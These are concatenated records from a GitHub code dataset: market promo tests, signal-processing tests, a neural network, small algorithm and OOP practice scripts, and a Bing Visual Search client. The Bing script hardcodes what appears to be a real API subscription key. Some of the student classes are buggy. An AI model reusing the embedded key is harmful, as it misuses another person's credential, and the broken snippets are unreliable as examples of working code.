включения промо в белый список он не показывается на выдаче\n \"\"\"\n self.check_promo(\n True, promo_sdc_single, msku_for_single_promo.sku, blue_offer_for_one_promo, rearr_flags=[None, 1]\n )\n self.dynamic.loyalty -= [DynamicBlueGenericBundlesPromos(whitelist=[promo_sdc_single.key])]\n self.check_promo(\n False, promo_sdc_single, msku_for_single_promo.sku, blue_offer_for_one_promo, rearr_flags=[None, 1]\n )\n self.dynamic.loyalty += [DynamicBlueGenericBundlesPromos(whitelist=[promo_sdc_single.key])]\n\n def test_spread_discount_count_blacklist(self):\n \"\"\"\n Проверяем, что при включении промо в черный список он исчезает из выдачи\n \"\"\"\n self.check_promo(\n True, promo_sdc_single, msku_for_single_promo.sku, blue_offer_for_one_promo, rearr_flags=[None, 1]\n )\n self.dynamic.loyalty += [DynamicPromoKeysBlacklist(blacklist=[promo_sdc_single.key])]\n self.check_promo(\n False, promo_sdc_single, msku_for_single_promo.sku, blue_offer_for_one_promo, rearr_flags=[None, 1]\n )\n self.dynamic.loyalty += [DynamicPromoKeysBlacklist(blacklist=[])]\n\n def test_spread_discount_count_low_discount(self):\n \"\"\"\n Проверяем, что промо не попадает в выдачу при маленькой скидке\n \"\"\"\n\n self.check_promo(\n False,\n promo_sdc_too_low_discount,\n msku_for_too_low_discount.sku,\n blue_offer_for_too_low_discount,\n rearr_flags=[None, 0, 1],\n )\n\n def test_spread_discount_count_priority_lower(self):\n \"\"\"\n Проверяем, что если на синем оффере одновременно два промо SpreadDiscountCount и CheapestAsGift, то, согласно приоритетам\n на репорте, CheapestAsGift выигрывает.\n \"\"\"\n\n offer = blue_offer_loose_for_cg\n promo = promo_cg_win\n request = 'place=prime&rids=0®set=1&pp=18&offerid={}&rgb=blue'.format(offer.waremd5)\n request += '&rearr-factors=market_promo_spread_discount_count=1'\n\n response = self.report.request_json(request)\n\n self.assertFragmentIn(\n response,\n [\n {\n 'entity': 'offer',\n 'wareId': offer.waremd5,\n 'prices': {\n 'value': str(offer.price),\n 'currency': 'RUR',\n },\n 'promos': [\n {\n 'type': promo.type_name,\n 'key': promo.key,\n 'startDate': NotEmpty() if promo.start_date else Absent(),\n 'endDate': NotEmpty() if promo.end_date else Absent(),\n 'url': promo.url,\n 'itemsInfo': {\n 'count': promo.cheapest_as_gift.count,\n 'promo_url': promo.cheapest_as_gift.promo_url,\n 'link_text': promo.cheapest_as_gift.link_text,\n 'constraints': {\n 'allow_berubonus': promo.cheapest_as_gift.allow_berubonus,\n 'allow_promocode': promo.cheapest_as_gift.allow_promocode,\n },\n },\n }\n ],\n }\n ],\n allow_different_len=False,\n )\n self.dynamic.market_dynamic.disabled_promos = [DynamicPromo(promo_key=promo.key)]\n self.check_promo(\n True, promo_sdc_loose_for_cg, msku_loose_for_cg.sku, blue_offer_loose_for_cg, rearr_flags=[None, 1]\n )\n self.dynamic.market_dynamic.disabled_promos = []\n\n def test_spread_discount_count_and_direct_discount(self):\n \"\"\"\n Проверяем, что если на синем оффере одновременно два промо SpreadDiscountCount и DirectDiscount, то они оба возвращаются в выдаче.\n При этом promoPriceWithTotalDiscount в SpreadDiscountCount должен учитывать скидку DirectDiscount\n \"\"\"\n\n offer = blue_offer_for_two_promos\n msku = msku_for_two_promos.sku\n dd_item = promo_dd_two_promos.direct_discount.items[0]\n request = 'place=prime&rids=0®set=1&pp=18&market-sku={}&rgb=blue'.format(msku)\n request += '&rearr-factors=market_promo_spread_discount_count=1'\n\n discount_price = dd_item['discount_price']['value']\n offer_old_price = offer.price_old if offer.price_old else offer.price\n old_price = dd_item['old_price']['value'] if 'old_price' in dd_item else offer_old_price\n discount_percent = self.__calc_discount_percent(old_price, discount_price)\n\n response = self.report.request_json(request)\n\n self.assertFragmentIn(\n response,\n [\n {\n 'entity': 'offer',\n 'wareId': offer.waremd5,\n 'prices': {\n 'value': str(discount_price),\n 'currency': 'RUR',\n },\n 'promos': [\n {\n 'type': promo_dd_two_promos.type_name,\n 'key': promo_dd_two_promos.key,\n 'startDate': NotEmpty() if promo_dd_two_promos.start_date else Absent(),\n 'endDate': NotEmpty() if promo_dd_two_promos.end_date else Absent(),\n 'url': promo_dd_two_promos.url,\n 'itemsInfo': {\n 'price': {\n 'currency': 'RUR',\n 'value': str(discount_price),\n 'discount': {\n 'absolute': str(old_price - discount_price),\n 'oldMin': str(old_price),\n 'percent': discount_percent,\n },\n },\n 'constraints': {\n 'allow_berubonus': promo_dd_two_promos.direct_discount.allow_berubonus,\n 'allow_promocode': promo_dd_two_promos.direct_discount.allow_promocode,\n },\n },\n },\n promo_sdc_two_promos.spread_discount_count.promo_fragment(\n offer, msku, current_price=discount_price\n ),\n ],\n }\n ],\n allow_different_len=False,\n )\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"market/GENERAL/test_blue_promo_spread_discount_count.py","file_name":"test_blue_promo_spread_discount_count.py","file_ext":"py","file_size_in_byte":17109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17794203961","text":"import unittest\n\nimport numpy as np\nfrom colorednoise import powerlaw_psd_gaussian\nfrom ..dummy_generator import (\n _make_time_index,\n dummy_physiological_noise,\n motion_noise,\n simulated_hemodynamics,\n)\nfrom mne.time_frequency import psd_array_multitaper\nfrom scipy.signal import savgol_filter\n\n\nclass DummyGeneratorTest(unittest.TestCase):\n def setUp(self):\n np.random.seed(42)\n\n def test_time_index(self):\n\n with self.assertRaises(RuntimeError):\n _make_time_index(0.001, 100)\n\n time_index = _make_time_index(1, 1000)\n\n self.assertTrue(np.allclose(time_index, np.arange(0, 1, 0.001)))\n\n time_index = _make_time_index(5, 50)\n self.assertEqual(time_index.shape[0], 50 * 5)\n\n def test_consistent_behavior(self):\n # duration and sample_rate should work the same way in all the generators\n\n sample_rate = 50\n duration = 1\n n_samples = duration * sample_rate\n sim_Hb = simulated_hemodynamics(\n amplitude=1, sample_rate=sample_rate, duration=duration\n )\n\n physio_noise = dummy_physiological_noise(\n amplitude=4e-7,\n sample_rate=sample_rate,\n interest_freq=1,\n phase=np.pi / 4,\n duration=duration,\n )\n\n measurement_noise = powerlaw_psd_gaussian(exponent=1.0, size=n_samples)\n\n self.assertEqual(sim_Hb.shape, physio_noise.shape)\n self.assertEqual(sim_Hb.shape, measurement_noise.shape)\n\n def test_sim_hemodynamics(self):\n duration = 30\n sample_rate = 50\n\n # Create simulated hemodynamics\n\n sim_Hb1 = simulated_hemodynamics(\n amplitude=1, sample_rate=sample_rate, duration=duration\n )\n\n sim_Hb2 = simulated_hemodynamics(\n amplitude=1, sample_rate=sample_rate * 2, duration=duration\n )\n\n # check that peak is basically 5s\n ts1 = _make_time_index(duration, sample_rate)\n ts2 = _make_time_index(duration, sample_rate * 2)\n self.assertAlmostEqual(np.abs(ts1[np.argmax(sim_Hb1)] - 5.0), 0)\n self.assertAlmostEqual(np.abs(ts2[np.argmax(sim_Hb2)] - 5.0), 0)\n\n def test_physiological_noise(self):\n duration = 1\n sample_rate = 1000\n interest_freq = 1\n\n sim_Hb = simulated_hemodynamics(\n amplitude=1, sample_rate=sample_rate, duration=duration\n )\n # Simulated cardiac noise\n cardiac_wave = dummy_physiological_noise(\n amplitude=4e-7,\n sample_rate=sample_rate,\n interest_freq=interest_freq,\n phase=np.pi / 4,\n duration=duration,\n )\n # Check dimensions\n self.assertEqual(sim_Hb.shape, cardiac_wave.shape)\n\n # Calculate the PSD and make sure the peak is in 1 Hz\n # calculate multitaper PSD\n psds, freqs = psd_array_multitaper(cardiac_wave, sample_rate, n_jobs=12)\n power_log10 = np.log10(psds)\n ind_of_peak = np.unravel_index(\n np.argmax(power_log10, axis=None), power_log10.shape\n )[0]\n self.assertAlmostEqual(freqs[ind_of_peak], interest_freq)\n\n cardiac_wave_double_freq = dummy_physiological_noise(\n amplitude=4e-7,\n sample_rate=sample_rate * 2,\n interest_freq=interest_freq,\n phase=np.pi / 4,\n duration=duration,\n )\n\n self.assertTrue(np.allclose(cardiac_wave, cardiac_wave_double_freq[::2]))\n\n def test_pink_noise(self):\n beta = 1\n sample_rate = 500\n duration = 2\n n_samples = duration * sample_rate\n y = powerlaw_psd_gaussian(exponent=beta, size=n_samples)\n # calculate the PSD\n psds, freqs = psd_array_multitaper(y, sample_rate, n_jobs=12)\n\n # after enough smoothing on PSD,\n # pink noise should follow smooth 1/f curve\n # thus low freq power > high freq power\n psds_smooth = savgol_filter(psds, 101, 3)\n low_freq_power = np.median(psds_smooth[:10])\n med_freq_power = np.median(psds_smooth[80:110])\n high_freq_power = np.median(psds_smooth[400:])\n self.assertGreaterEqual(low_freq_power, med_freq_power)\n self.assertGreaterEqual(med_freq_power, high_freq_power)\n\n # make sure behavior is same if we change sampling frequency\n # TODO: make this a slightly more robust test\n y_double_freq = powerlaw_psd_gaussian(exponent=beta, size=2 * n_samples)\n psds, freqs = psd_array_multitaper(y_double_freq, sample_rate, n_jobs=12)\n\n psds_smooth = savgol_filter(psds, 101, 3)\n low_freq_power = np.median(psds_smooth[:10])\n med_freq_power = np.median(psds_smooth[80:110])\n high_freq_power = np.median(psds_smooth[400:])\n self.assertGreaterEqual(low_freq_power, med_freq_power)\n self.assertGreaterEqual(med_freq_power, high_freq_power)\n\n def test_motion_noise(self):\n duration = 20\n sample_rate = 5000\n\n # this conveniently checks that we don't throw if duration\n # exceeds window ize\n noise = motion_noise(\n motion_amplitude=3,\n motion_duration_mean=0.5,\n sample_rate=sample_rate,\n sample_duration=duration,\n )\n\n # the nonzero (noise) part should have slope \\approx motion_amplitude\n # but this is not a tight test since we get a random chunk\n nonzero = noise[noise > 0]\n slope = (nonzero[-1] - nonzero[0]) / len(nonzero) * sample_rate\n self.assertAlmostEqual(slope, 3.0, places=2)\n\n sample_rate = 150\n noise = motion_noise(\n motion_amplitude=1.75,\n motion_duration_mean=0.5,\n sample_rate=sample_rate,\n sample_duration=duration,\n )\n\n nonzero = noise[noise > 0]\n slope = (nonzero[-1] - nonzero[0]) / len(nonzero) * sample_rate\n self.assertAlmostEqual(slope, 1.75, places=2)\n","repo_name":"facebookresearch/labgraph","sub_path":"signal_processing/synthetic_data/tests/test_dummy_generator.py","file_name":"test_dummy_generator.py","file_ext":"py","file_size_in_byte":5942,"program_lang":"python","lang":"en","doc_type":"code","stars":150,"dataset":"github-code","pt":"72"} +{"seq_id":"72620352233","text":"# morse_dict = {'.-': 'A', '-...': 'B', '-.-.': 'C', '-..': 'D', '.': 'E', '..-.': 'F', '--.': 'G',\r\n# '....': 'H', '..': 'I', '.---': 'J', '-.-': 'K', '.-..': 'L', '--': 'M', '-.': 'N',\r\n# '---': 'O', '.--.': 'P', '--.-': 'Q', '.-.': 'R', '...': 'S', '-': 'T', '..-': 'U',\r\n# '...-': 'V', '.--': 'W', '-..-': 'X', '-.--': 'Y', '--..': 'Z'}\r\n\r\n# strokes_dict = {'A': 3, 'B': 2, 'C': 1, 'D': 2, 'E': 3, 'F': 3, 'G': 2, 'H': 3, 'I': 3, 'J': 1,\r\n# 'K': 2, 'L': 1, 'M': 2, 'N': 2, 'O': 1, 'P': 2, 'Q': 2, 'R': 2, 'S': 1, 'T': 2,\r\n# 'U': 1, 'V': 1, 'W': 1, 'X': 2, 'Y': 2, 'Z': 1}\r\n\r\n# f = [0] + [float('inf')] * len('--..--.')\r\n# for i in range(1, len('--..--.')+1):\r\n# for j in range(i):\r\n\r\n# if '--..--.'[j:i] in morse_dict:\r\n# f[i] = min(f[i], f[j] + strokes_dict[morse_dict['--..--.'[j:i]]])\r\n# print(morse_dict['--..--.'[j:i]], strokes_dict[morse_dict['--..--.'[j:i]]])\r\n# print(f[len('--..--.')])\r\n\r\nfrom collections import deque\r\n\r\n\r\ndef longestSubarray(nums, limit = 1) :\r\n # Example: [10,1,2,4,7,4,3,1], limit = 5\r\n dqMax, dqMin = deque(), deque()\r\n ans = 0\r\n l = 0\r\n n = len(nums)\r\n for r in range(n):\r\n while dqMax and nums[dqMax[-1]] <= nums[r]: # If we found a larger element then no need to keep smaller elements\r\n dqMax.pop()\r\n while dqMin and nums[dqMin[-1]] >= nums[r]: # If we found a smaller element then no need to keep larger elements\r\n dqMin.pop()\r\n dqMax.append(r)\r\n dqMin.append(r)\r\n \r\n while nums[dqMax[0]] - nums[dqMin[0]] > limit:\r\n l += 1 # Shrink size by moving the left pointer\r\n if dqMax[0] < l: dqMax.popleft()\r\n if dqMin[0] < l: dqMin.popleft()\r\n \r\n ans = max(ans, r - l + 1)\r\n \r\n return ans\r\n\r\nh = [1,3,3,3,4,4,7,8,7,8,7,4,8,7]\r\nprint(longestSubarray(h))\r\nn = len(h)\r\nleft = 0\r\nright = 0\r\n# max_height = h[0]\r\n# min_height = h[0]\r\n# max_length = 0\r\n\r\n# n = len(h)\r\n# left = 0\r\n# max_length = 0\r\n# max_height = h[0]\r\n# min_height = h[0]\r\n\r\n# # for right in range(n):\r\n# # max_height = max(max_height, h[right])\r\n# # min_height = min(min_height, h[right])\r\n# # if max_height - min_height > 1:\r\n# # left += 1\r\n# # # adjust max_height and min_height using two pointers\r\n# # if h[left-1] == max_height:\r\n# # max_height = max(h[left:right+1])\r\n# # if h[left-1] == min_height:\r\n# # min_height = min(h[left:right+1])\r\n# # max_length = max(max_length, right - left + 1)\r\n\r\n# # print(max_length)\r\n\r\n\r\ntemp = 1\r\nmax_length = 0\r\nprev = False\r\nmin_height = h[0]\r\nmax_height = h[0]\r\nfor i in range(1,len(h)):\r\n min_height = min(min_height,h[i], h[i-1])\r\n max_height = max(max_height,h[i], h[i-1])\r\n if max_height - min_height > 1:\r\n temp = 1\r\n min_height = h[i]\r\n max_height = h[i]\r\n else:\r\n temp += 1\r\n max_length = max(max_length, temp)\r\n\r\nprint(max_length)\r\n\r\n# for i in range(1,len(h)):\r\n# if abs(h[i] - h[i-1]) < 1:\r\n# temp += 1\r\n# prev = False\r\n# print(temp,\"here\")\r\n# elif abs(h[i] - h[i-1]) == 1 and prev == True:\r\n# temp += 1\r\n# print(temp)\r\n# max_length = max(max_length, temp)\r\n# prev = False\r\n# temp = 1\r\n# elif abs(h[i] - h[i-1]) >= 1 and prev == True:\r\n# temp = 1\r\n# prev=False\r\n# # elif abs(h[i] - h[i-1]) <= 1 and prev:\r\n# # temp += 1\r\n# max_length = max(max_length, temp)\r\n\r\n# print(max_length)\r\n\r\n\r\n # temp = 0\r\n # min_height = min(min_height,h[i])\r\n # max_height = max(max_height,h[i])\r\n # if max_height - min_height > 1:\r\n\r\n\r\n\r\n# max_length = 0\r\n# max_height = h[0]\r\n# min_height = h[0]\r\n# while right < n-1:\r\n# right += 1\r\n# max_height = max(max_height, h[right])\r\n# min_height = min(min_height, h[right])\r\n# while max_height - min_height > 1:\r\n# left += 1\r\n# max_height = max(h[left:right+1])\r\n# min_height = min(h[left:right+1])\r\n# max_length = max(max_length, right - left + 1)\r\n\r\n# print( max_length)\r\n\r\n\r\n# print(longestSubarray([1,3,4,4,7,7,7,8]))","repo_name":"ashwinnellimuttath/Algorithms-Coursework-UCR","sub_path":"3assignment/challenge/stroke.py","file_name":"stroke.py","file_ext":"py","file_size_in_byte":4314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29001567187","text":"mes=int(input(\"digite el numero segun corresponda al mes \\n \"\r\n \"1 ->enero \\n\"\r\n \"2 ->febrero \\n\"\r\n \"3 ->marzo \\n\"\r\n \"4 ->abril \\n\"\r\n \"5 ->mayo \\n\"\r\n \"6 ->junio \\n\"\r\n \"7 ->julio \\n\"\r\n \"8 ->agosto\\n\"\r\n \"9 ->septiembre \\n\"\r\n \"10 ->octubre \\n\"\r\n \"11 -noviembre \\n\"\r\n \"12 ->diciembre \\n\"\r\n))\r\n\r\nif mes>0 and mes<=3:\r\n print(\"invierno\")\r\nelif mes==4 or mes==6:\r\n print (\"Equinoccio de primavera que inicia en 20 de marzo 21 de junio\")\r\nelif mes==7 or mes==9:\r\n print (\"Solsticio de verano (21 de junio) - Equinoccio de otoño (23 de septiembre)\")\r\nelif mes==10 or mes==12:\r\n print(\"Equinoccio de otoño (23 de septiembre) - Solsticio de invierno (22 de diciembre)\")\r\nelse:\r\n print(\"dato erroneo\")","repo_name":"luisfe23os/condiciones1","sub_path":"clima.py","file_name":"clima.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18118943450","text":"import requests, json\n\nBASE_URI = 'https://api.bing.microsoft.com/v7.0/images/visualsearch'\nSUBSCRIPTION_KEY = '438b8e05404840cd9726c5d9802f9f16'\nfilePath = 'test_image.jpg'\n\n#formData = '{\"knowledgeRequest\":{\"invokedSkills\": [\"SimilarImages\"]}}'\n\n#file = {'knowledgeRequest': (None, formData)}\n\nfile = {'image' : ('myfile', open(filePath, 'rb'))}\n\n\nHEADERS = {'Ocp-Apim-Subscription-Key': SUBSCRIPTION_KEY}\n\ndef print_json(obj):\n \"\"\"Print the object as json\"\"\"\n print(json.dumps(obj, sort_keys=True, indent=2, separators=(',', ': ')))\n\ndef save_json(obj, file_path):\n with open(file_path, \"w\") as json_file:\n json.dump(obj, json_file)\n\ntry:\n response = requests.post(BASE_URI, headers=HEADERS, files=file)\n response.raise_for_status()\n #tags = response.json().tags\n #print(len(tags))\n #print_json(response.json())\n #print(response.json()[\"tags\"])\n save_json(response.json(), \"response.json\")\n \nexcept Exception as ex:\n raise ex\n","repo_name":"1viorel/hacktm2023_4c4w","sub_path":"python_backend/test_bing_visual.py","file_name":"test_bing_visual.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21550869562","text":"\"\"\"\ntelemetry_logger.py\n\nWrites telemetry data to CSV file\n\"\"\"\n\nimport time\n\nclass TelemetryLogger(object):\n def __init__(self, is_enabled): \n self.is_enabled = is_enabled\n\n def start(self):\n if self.is_enabled:\n timestr = time.strftime(\"%m%d-%H%M\")\n fname = \"telemetry-\" + timestr + \".csv\"\n print(\"Opening telemetry log file:\", fname)\n self.outfile = open(fname,\"w\")\n self.outfile.write(\"time,surge,sway,heave,roll,pitch,yaw\\n\")\n \n def stop(self):\n if self.is_enabled:\n self.outfile.close()\n print(\"Closing log file\")\n\n def write(self, data):\n if self.is_enabled:\n self.outfile.write(data)\n\nif __name__ == \"__main__\":\n\n t = TelemetryLogger(True)\n t.start()\n t.write(\"0,1,2,3,4,5,6\\n\")\n t.write(\"1,2,3,4,5,6,7\\n\")\n t.stop()\n","repo_name":"michaelmargolis/MdxMotionPlatformV3","sub_path":"runtime/agents/nolimits_coaster/telemetry_logger.py","file_name":"telemetry_logger.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33111712156","text":"#!/usr/bin/env python\n#\n# This code is heavily based on code used during video lectures from\n# Mathematical Monk's videos about Gaussian Processes on youtube\n#\n# https://www.youtube.com/user/mathematicalmonk\n#\n# I am just reimplementing it in an attempt to understand it better\n\nimport numpy as np\nimport matplotlib.pyplot as plot\nimport argparse\n\n\ndef cov_function(c):\n \"\"\" Returns a covariance function given an int input\"\"\"\n return {\n '1': lambda x, y : 1 * (x.T * y),\n '2': lambda x, y : 1 * min(x, y),\n '3': lambda x, y : np.exp(-100 * ((x - y).T * (x - y)))\n }[str(c)]\n\ndef main():\n parser = argparse.ArgumentParser(description='Script to draw functions from '\\\n 'a Gaussian Process')\n parser.add_argument('-x', type=int, nargs=2, default=(0,5))\n parser.add_argument('-s', type=int, default=100)\n parser.add_argument('-c', type=int, default=1)\n args = parser.parse_args()\n\n # Sample values\n x = np.linspace(args.x[0], args.x[1], num=args.s)\n n = len(x)\n # Covariance matrix\n c = np.zeros((n, n))\n # Select covariance function\n k = cov_function(args.c)\n\n # Build a covariance matrix using x values and the covariance function\n for i in range(n):\n for j in range(n):\n c[i, j] = k(x[i], x[j])\n\n # Now we randomly sample from the distribution made by the covariance matrix\n u = np.random.randn(n, 1)\n A, s, B = np.linalg.svd(c)\n S = np.diag(s)\n z = A.dot(np.sqrt(S).dot(u))\n\n plot.plot(x, z)\n plot.show()\n\nif __name__=='__main__':\n main()\n","repo_name":"andrewrch/gp_visualise_1d","sub_path":"gp_visualise_1d.py","file_name":"gp_visualise_1d.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21933497952","text":"import numpy as np\nimport random\n\nclass Network(object):\n\n def __init__(self,sizes):\n # sizes: array, numbers of neurons at each layer\n self.NumOfLayers = len(sizes)\n self.sizes = sizes\n # weights: between two neighbour layers there is a weight matrixe with size (n+1 th layer\n # size, n th layer size)\n self.weights = [np.random.randn(y,x) for x,y in zip(sizes[:-1],sizes[1:])]\n # input layer (0th) has no bias\n self.biases = [np.random.randn(x,1) for x in sizes[1:]]\n\n def FeedForward(self,a):\n # iteratively calculate output of a neural network\n # no need to save intermedia values, because this function is only used for evaluation\n for w,b in zip(self.weights,self.biases):\n a = sigmoid(np.dot(w,a)+b) # matrix multiply\n return a\n\n def BPCore(self, Input, RefResult):\n # calculate \\nabla{b} and \\nabla{w} using backward propagation\n # allocate memory for nabla results\n nabla_b = [np.zeros(b.shape) for b in self.biases]\n nabla_w = [np.zeros(w.shape) for w in self.weights]\n # --------- feed forward ----------\n # first activation array is input\n actv = Input\n # save every intermedia activation arrar\n actvs = [actv]\n # save every intermedia z (start from layer 2)\n zs = []\n # do feed forward\n for b,w in zip(self.biases,self.weights):\n z = np.dot(w,actv) + b\n zs.append(z)\n actv = sigmoid(z)\n actvs.append(actv)\n # --------- backward propagate ---------\n # for the last layer\n delta = cross_entropy_cost_derivate(actvs[-1], RefResult)\n # foundation equation 3\n nabla_b[-1] = delta\n # foundation equation 4\n nabla_w[-1] = np.dot(delta, actvs[-2].transpose())\n # for -2 ~ 1 layers\n for l in xrange(2,self.NumOfLayers):\n z = zs[-l]\n zp = sigmoid_d(z)\n # update delta\n delta = np.dot(self.weights[-l + 1].transpose(),delta) * zp\n nabla_b[-l] = delta\n nabla_w[-l] = np.dot(delta,actvs[-l-1].transpose())\n return (nabla_b,nabla_w)\n\n def update_network(self, TrainData, eta):\n # update weights and biases of network according a batch of examples in TrainData\n # calculate \\nabla{b} and \\nabla{w} according to each example\n # then use mean value from all examples in gradient descent\n # eta is the learning rate\n nabla_b = [np.zeros(b.shape) for b in self.biases]\n nabla_w = [np.zeros(w.shape) for w in self.weights]\n # for each example\n for Input,RefResult in TrainData:\n nabla_b_i,nabla_w_i = self.BPCore(Input,RefResult)\n nabla_b = [nb + nbi for nb,nbi in zip(nabla_b,nabla_b_i)]\n nabla_w = [nw + nwi for nw,nwi in zip(nabla_w,nabla_w_i)]\n # do update\n self.weights = [ow - eta * (nw / len(TrainData)) for ow,nw in zip(self.weights,nabla_w)]\n self.biases = [ob - eta * (nb / len(TrainData)) for ob,nb in zip(self.biases,nabla_b)]\n\n def evaluate(self,TestData):\n # use FeedForward on each test sample\n r = [(np.argmax(self.FeedForward(T)),y) for (T,y) in TestData]\n # how many of them is right?\n return sum([int(x==y) for (x,y) in r])\n\n def StochasticGradientDesent(self, TrainData, TrainRound, BatchSize, eta, TestData = None):\n # wrapper function to organise all above functions\n # split TrainData into batches, feed them to update_network in batch-by-batch manner\n # repeat the procedure for TrainRound times\n # after each train round, apply TestData to evaluate the network, and output result\n NumOfTrainData = len(TrainData)\n for i in xrange(TrainRound):\n # rearrange train data randomly\n random.shuffle(TrainData)\n # in python expression array[a:b], b can be larger than len(array)\n # when b > len(array), array[a:b] = array[a:]\n TrainDataBatches = [TrainData[k:k+BatchSize] for k in xrange(0,NumOfTrainData,BatchSize)]\n # update network\n for batch in TrainDataBatches:\n self.update_network(batch,eta)\n # test and output if required\n if TestData:\n print(\"Round {0}: {1} / {2} correct\"\n \"...\".format(i+1,self.evaluate(TestData),len(TestData)))\n else:\n print(\"Round {0} train finished ...\".format(i))\n\n# calculate derivate of square cost function\ndef cross_entropy_cost_derivate(OutputActivation, ReferenceResult):\n return OutputActivation - ReferenceResult\n\n# sigmoid functions\n# sigmoid\ndef sigmoid(z):\n # input can be signle number or array\n return 1.0/(1.0+np.exp(-z))\n# devivate of sigmoid\ndef sigmoid_d(z):\n r = sigmoid(z)\n return r*(1-r)\n","repo_name":"metorm/DeepLearningTutorial","sub_path":"Network.py","file_name":"Network.py","file_ext":"py","file_size_in_byte":4905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17021461200","text":"# OOPS\n# Syntax\n# class Classname:\n#\n# class Person:\n#\n#\n# def speak(self):\n# print('welcome')\n#\n#\n# obj1=Person()\n\n\nclass Student:\n def marks(self):\n a = 10\n b = 20\n print(a + b)\n\n\nobj2 = Student()\nobj3 = Student()\n\n\n# can create mulitple objects for a class\n# here marks is the behaviour or functionality of the objects\n\n# self is used to point to the instance variable\n#\n# class Employee:\n# def details(self, salary, age):\n# self.salary = salary\n# self.age = age\n\n\n# Bank Class\n\nclass Bank:\n def details(self, bank, minibalance):\n self.bank = bank\n self.minibalance = minibalance\n\n def deposit(self, account):\n amount = int(input('Enter amount: '))\n self.minibalance += amount\n\n def withdrawal(self, balance):\n self.minibalance = balance\n withdraw_amt = int(input('Enter amount to withdraw: '))\n self.minibalance -= withdraw_amt\n\n def bal_enquiry(self, balance):\n self.minibalance = balance\n\n # def withdrawal(self,minibalance):\n\n\nclass Student:\n def details(self, name, id, college):\n self.stud_name = name\n self.stud_id = id\n self.college = college\n\n def display(self):\n print('Student Name: ', self.stud_name)\n print('ID: ', self.stud_id)\n print('college: ', self.college)\n\n\nclass Bank:\n def account_details(self, holder_name, account_type, balance, max_amount, min_amount):\n self.name = holder_name\n self.type = account_type\n self.balance = balance\n self.max_amt = max_amount\n self.min_amt = min_amount\n\n def deposit(self):\n amount = int(input('Amount: '))\n if amount < self.max:\n self.bal += amount\n print(self.bal)\n else:\n print('Amount Exceeded')\n\n def withdrawal(self, min_amount):\n print('Current Balance:', self.bal)\n amount = int(input('Amount: '))\n\n if amount < self.min:\n self.bal -= amount\n print(self.bal)\n else:\n print('min_amount exceeded')\n","repo_name":"jisshub/python-django-training","sub_path":"oops-python/oop-basics.py","file_name":"oop-basics.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4318196948","text":"# panda3d imports\nfrom panda3d.core import (AmbientLight, Spotlight, PointLight, Vec3)\n\n__author__ = \"Jonty Doyle\"\n__email__ = \"dyljon001@myuct.ac.za\"\n__date__ = \"21 September 2022\"\n\nLIGHT_HEIGHT = 100\n\n\nclass Lights:\n \"\"\"Defines lighting for rendered model\"\"\"\n\n def __init__(self, base):\n self.base = base\n self.__set_lights()\n\n def __set_lights(self):\n \"\"\"Sets default lighting\"\"\"\n self.__set_ambient_light()\n self.__set_down_light(0.8, LIGHT_HEIGHT)\n self.__set_point_light(0.6)\n\n def __set_ambient_light(self):\n \"\"\"Sets light as ambient as defined in panda3d\"\"\"\n a = AmbientLight('ambient-light')\n a.setColor((0.2, 0.2, 0.2, 1))\n node = self.base.render.attachNewNode(a)\n node.setZ(LIGHT_HEIGHT)\n self.base.render.setLight(node)\n\n def __set_down_light(self, strength, height):\n \"\"\"Sets direction of down light as defined by panda3d\"\"\"\n p = PointLight('down-light')\n\n p.setShadowCaster(True, 512, 512)\n p.setColor((strength, strength, strength, 1))\n\n node = self.base.render.attachNewNode(p)\n node.setZ(height)\n node.lookAt(0, 0, 0)\n self.base.render.setLight(node)\n\n def __set_point_light(self, strength):\n \"\"\"Sets direction of point light light as defined by panda3d\"\"\"\n p = PointLight('point-light')\n p.setColor((strength, strength, strength, 1))\n\n self.light_node = self.base.render.attachNewNode(p)\n self.base.render.setLight(self.light_node)\n\n def update(self, config):\n \"\"\"Updates model lighting.\n Typically used when model is created or cleared.\"\"\"\n self.light_node.setPos(-config.x, -config.y, LIGHT_HEIGHT)\n self.light_node.lookAt(0, 0, 0)\n","repo_name":"HamzaAmir123/CapstoneProject","sub_path":"src/app/lights.py","file_name":"lights.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2190006140","text":"#!/usr/bin/env python3\n'''module that deals with functions'''\n\ndef commandpush(devicecmd): #devicecmd=list\n ''' push commands to devices '''\n for coffeetime in devicecmd.keys():\n print(\"Handshaking......connecting with \" + coffeetime)\n for mycmds in devicecmd[coffeetime]:\n print(\"Attempting to sending command --> \" + mycmds)\n print(\"\\n\")\n\ndef betterpush(filename): #file name having ip and commands\n '''better push commands to devices'''\n fstream = open(filename, \"r\")\n #lines = fstream.readlines()\n for l_a in fstream:\n #print(l)\n s_a = str(l_a).strip()\n #print(s)\n print(s_a.isnumeric())\n #if s.isalpha()== True:\n # print(\"Attempting to sending command --> \" + s, end=\"\")\n #else:\n # print(\"Handshanking....connecting with \" + s, end=\"\")\n\ndef deviceboot(iplist): #list of IPs\n '''boot list of IPs '''\n for ip_a in iplist:\n print(\"Connecting to... \" + ip_a)\n print(\"Rebooting NOW!...\")\n\n\n\ndef main():\n ''' main function '''\n work2do = {\"10.1.0.1\":[\"interface eth1/2\", \"no shut\"],\n \"10.2.0.1\":[\"interface eth1/1\", \"shutdown\"]}\n iplist = [\"10.1.0.1\", \"10.2.0.1\"]\n work2do_file = \"work2do.txt\"\n\n print(\"Welcome to the network device command pusher\") # welcome message\n #get data 